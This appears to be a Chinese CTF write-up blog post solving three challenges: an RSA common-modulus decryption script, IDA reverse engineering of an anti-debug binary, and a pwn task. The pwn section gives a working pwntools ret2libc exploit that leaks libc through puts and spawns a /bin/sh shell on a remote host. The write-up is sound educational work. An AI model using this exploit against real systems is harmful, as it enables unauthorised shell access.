zoukankan      html  css  js  c++  java
  • 巅峰极客线上第二场部分ctf

     一、RSA

    题目给出flag1.enc、flag2.enc、pubkey1.pem、pubkey1.pem四个文件

    使用以下指令提取pem文件中的n和e

    rsa -pubin -text -modulus -in pubkey1.pem

    rsa -pubin -text -modulus -in pubkey2.pem

    user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey1.pem
    Public-Key: (2048 bit)
    Modulus:
        00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
        3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
        8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
        bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
        a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
        c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
        dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
        ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
        4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
        70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
        03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
        79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
        ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
        2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
        e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
        e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
        8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
        42:17
    Exponent: 2333 (0x91d)
    Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88
    mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2
    6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV
    0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX
    rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD
    Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC
    FwICCR0=
    -----END PUBLIC KEY-----

    得到第一个
    e:2333
    n:0xModulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217

    user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey2.pem
    Public-Key: (2048 bit)
    Modulus:
        00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
        3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
        8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
        bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
        a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
        c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
        dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
        ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
        4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
        70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
        03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
        79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
        ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
        2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
        e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
        e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
        8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
        42:17
    Exponent: 23333 (0x5b25)
    Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88
    mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2
    6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV
    0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX
    rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD
    Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC
    FwICWyU=
    -----END PUBLIC KEY-----

    得到第二个
    e:23333
    n:0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217

    共模攻击代码参考:http://www.freebuf.com/column/148898.html  (PS:此题还需对原两个enc文件进行base64解密)

    # -*- coding: utf-8 -*-
    
    from libnum import n2s,s2n
    from gmpy2 import invert
    import base64
    # 欧几里得算法
    def egcd(a, b):
        if a == 0:
            return (b, 0, 1)
        else:
            g, y, x = egcd(b % a, a)
            return (g, x - (b // a) * y, y)
    
    def main():
        n = 0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217 
        fo1 = open('flag1.enc','rb')
        fo2 = open('flag2.enc','rb')
    
        datafo1 = fo1.read()
        datafo2 = fo2.read()
    
        c1 = s2n(base64.b64decode(datafo1))
        c2 = s2n(base64.b64decode(datafo2))
    
        fo1.close()
        fo2.close()
    
        e1 = 2333 
        e2 = 23333
    
        s = egcd(e1, e2)
    
        s1 = s[1]
        s2 = s[2]
    
        # 求模反元素
        if s1<0:
            s1 = - s1
            c1 = invert(c1, n)
        elif s2<0:
            s2 = - s2
            c2 = invert(c2, n)
        m = pow(c1,s1,n)*pow(c2,s2,n) % n
        print(n2s(m))
    
    if __name__ == '__main__':
      main()

    得到flag:

    flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}

    二、Antidbg

    IDA打开看到,在字符串窗口中看到pause

    转到对应汇编处,F5,positive sp value has been found。

    菜单栏 ==> Options ==> General ,把Stack Pointer勾上

    参考:https://blog.csdn.net/kendyhj9999/article/details/78175149

    在左侧出现负的sp的上一行处,按Alt + K,弹出一个窗口,在当前差异前加一个负号,单击确定。

    再次F5

    int __usercall sub_4011A0@<eax>(char a1@<sil>)
    {
      memset(input, 0, 0x32u);
      CoInitialize(0);
      CreateThread(0, 0, StartAddress, 0, 0, 0);
      sub_401050((const char *)&unk_402128, (unsigned int)input);
      if ( strlen(input) == 42 )
      {
        i = 0;
        v3 = xmmword_4021C0;
        v5 = 34080258;
        v4 = xmmword_4021B0;
        v6 = 33882121;
        v7 = 3330;
        while ( input[i] >> 4 == dword_403018[a[i]] && (input[i] & 0xF) == dword_402138[*((char *)&v3 + i)] )
        {
          if ( ++i >= 42 )
          {
            v9 = 1667462515;
            v10 = 7566181;
            goto LABEL_8;
          }
        }
        LOWORD(v10) = 114;
        v9 = 1869771365;
    LABEL_8:
        sub_401020(&v9, a1);
      }
      system("pause");
      return 0;
    }

    动态调试后dword_403018数组 402138数组的值:

                

     数组a:

    v3:

    根据反汇编出来的结果可以知道是通过a数组中的值索引到403018对应的值,这里面是一个字符的高4位,通过数组v3中的值索引到402138对应的值,这里面是一个字符的低4位。(这里刚好402138其对应值个其对应的索引相等,写脚本的时候就用不着把402138也列出来了)

    a = [
    0x02 ,0x02 ,0x02 ,0x02 ,0x03 ,0x01 ,0x01 ,0x02 , 
    0x01 ,0x01 ,0x02 ,0x01 ,0x01, 0x00 ,0x01 ,0x01 ,
    0x02 ,0x02 ,0x00 ,0x01 ,0x01 ,0x01 ,0x01 ,0x00 ,
    0x01 ,0x01 ,0x02 ,0x02 ,0x00 ,0x01 ,0x01 ,0x02 ,
    0x02 ,0x01 ,0x01 ,0x01 ,0x01 ,0x01 ,0x02 ,0x01 ,
    0x01 ,0x03]
    
    v_3018 = [2, 3, 6, 7]
    
    v3 = [
    0x06, 0x0C, 0x01, 0x07, 0x0B, 0x00, 0x06, 0x02, 
    0x01, 0x06, 0x01, 0x07 ,0x02, 0x0D, 0x05, 0x01,
    0x03, 0x03, 0x0D, 0x04, 0x03, 0x01, 0x00, 0x0D,
    0x08, 0x08, 0x01, 0x02, 0x0D, 0x07, 0x00, 0x01,
    0x02, 0x06, 0x08, 0x02, 0x09, 0x00, 0x05, 0x02,
    0x02, 0x0d]
    
    flag = ''
    for i in range(42):
        ch = v_3018[a[i]]<<4    
        ch = ch | v3[i]
        flag += chr(ch)
    
    print(flag)

    得到flag:

    flag{06b16a72-51cc-4310-88ab-70ab68290e22}

    三、PWN PlainR2B

     题目给了一个pwn和一个libc.so

    F5

    int game()
    {
      int result; // eax
      char buf; // [esp+Ch] [ebp-1Ch]
    
      puts("First, what's your name?");
      if ( read(0, &name, 0x14u) > 19 )
      {
        puts("Oh, your name too loooooong...");
        exit(0);
      }
      setbuf(stdin, 0);
      setbuf(stdout, 0);
      setbuf(stderr, 0);
      printf("%s, do you want to get flag?
    ", &name);
      read(0, &buf, 0x34u);
      if ( !strcmp(&buf, "yes") || (result = strcmp(&buf, "YES")) == 0 )
        result = printf("OK,the flag is flag{%s}, enmmm... but is true?", "WorkToWeekT_T");
      return result;
    }

    可以看到在read(0, &buf, 0x34u);处有栈溢出。

    覆盖到puts处泄露libc计算system,返回地址设为game,再次覆盖返回地址,覆盖成system。

    from pwn import *
    #p = process('./pwn')
    p = remote('117.50.60.184', 12345)
    elf = ELF('./pwn')
    libc = ELF('./libc-2.23.so')
    
    puts_libc = libc.symbols['puts']
    system_libc = libc.symbols['system']
    binsh_libc = libc.search('/bin/sh').next()
    game = elf.symbols['game']
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    
    payload = 'A'*0X1C + 'B'*4 + p32(puts_plt) + p32(game) + p32(puts_got) 
    
    p.recvuntil('name?')
    p.sendline('haha')
    p.recvuntil('flag?')
    p.sendline(payload)
    
    p.recv(1)
    puts_addr = u32(p.recv(4))
    system_addr = puts_addr - puts_libc + system_libc
    binsh_addr = puts_addr - puts_libc + binsh_libc
    
    payload1 = 'A'*0x1c + 'B'*4 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
    
    p.recvuntil('name?')
    p.sendline('Brian')
    p.recvuntil('flag?')
    p.sendline(payload1)
    
    p.interactive()
      
  • 相关阅读:
    java.lang.OutOfMemoryError: GC overhead limit exceeded
    Ural 1146 Maximum Sum(DP)
    [算法系列之四]优先级队列
    Python源代码--整数对象(PyIntObject)的内存池
    3星|何帆《猜测与偏见》:社科书评集
    4星|《认识经济》:全面系统的经济学普及读物,鸿篇巨制,价格超贵
    3星|《东方启动点》:民营企业家们的故事,故事多分析概括少
    2星|《大师的管理课》:畅销书作家们的35篇励志散文
    3.5星|《蓝海战略2》:实施蓝海战略的具体工具与方法。案例牵强且偏老旧
    2星|《读懂华为30年》:基于公开资料的整理和肤浅的发挥
  • 原文地址:https://www.cnblogs.com/ha2ha2/p/9578106.html
Copyright © 2011-2022 走看看